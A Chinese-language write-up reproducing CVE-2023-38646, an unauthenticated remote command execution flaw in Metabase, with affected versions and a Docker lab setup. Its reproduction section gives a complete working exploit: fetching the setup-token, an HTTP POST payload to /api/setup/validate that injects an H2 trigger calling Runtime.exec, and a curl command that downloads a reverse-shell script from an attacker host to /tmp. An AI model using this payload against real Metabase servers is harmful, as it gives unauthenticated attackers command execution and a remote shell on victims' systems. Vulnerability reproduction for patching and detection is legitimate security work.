CVE-2023-38646：Metabase遠程命令執行漏洞

0x01 簡介

Metabase是一個開源的數據分析和可視化工具，它可以幫助用戶輕松地連接到各種數據源，包括數據庫、云服務和API，然后使用直觀的界面進行數據查詢、分析和可視化。

0x02 漏洞概述

漏洞編號：CVE-2023-38646

Metabase open source 0.46.6.1之前的版本和Metabase Enterprise 1.46.6.1之前的版本存在一個漏洞，允許攻擊者在服務器的權限級別上執行任意命令，利用時不需要身份驗證。

該漏洞是由預身份驗證 API 端點/api/setup/validate中的 JDBC 連接問題引起的。通過向該端點發出請求，我們成功實現了遠程代碼執行（RCE）。

0x03 影響版本

Metabase open source 0.46 < 0.46.6.1
Metabase Enterprise 1.46 < 1.46.6.1
Metabase open source 0.45 < v0.45.4.1
Metabase Enterprise 1.45 < 1.45.4.1
Metabase open source 0.44 < 0.44.7.1
Metabase Enterprise 1.44 < 1.44.7.1
Metabase open source 0.43 < 0.43.7.2
Metabase Enterprise 1.43 < 1.43.7.2

0x04 環境搭建

本地搭建

sudo docker run -d -p 3000:3000 --name metabase metabase/metabase:v0.46.6

0x05 漏洞復現

本地環境

通過訪問IP:3000/api/session/properties獲取setup-token。截圖如下：

獲取到setup-token后構建poc執行反彈shell

由于靶機環境無法直接反彈shell，所以先構造一個反彈shell腳本，讓靶機獲取該腳本并執行，從而成功反彈

具體步驟如下：

訪問/api/setup/validate，并構造payload獲取攻擊服務器的2.sh文件,實際執行命令為:

curl http://192.168.222.184:8000/2.sh -o /tmp/2.sh

具體poc如下：

POST /api/setup/validate HTTP/1.1
Host: IP
Content-Type: application/json
{
 "token": "token值",
 "details": {
  "is_on_demand": false,
  "is_full_sync": false,
  "is_sample": false,
  "cache_ttl": null,
  "refingerprint": false,
  "auto_run_queries": true,
  "schedules": {},
  "details": {
   "db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec(具體執行的命令)\n$$--=x",
   "advanced-options": false,
   "ssl": true
  },
  "name": "test",
  "engine": "h2"
 }
}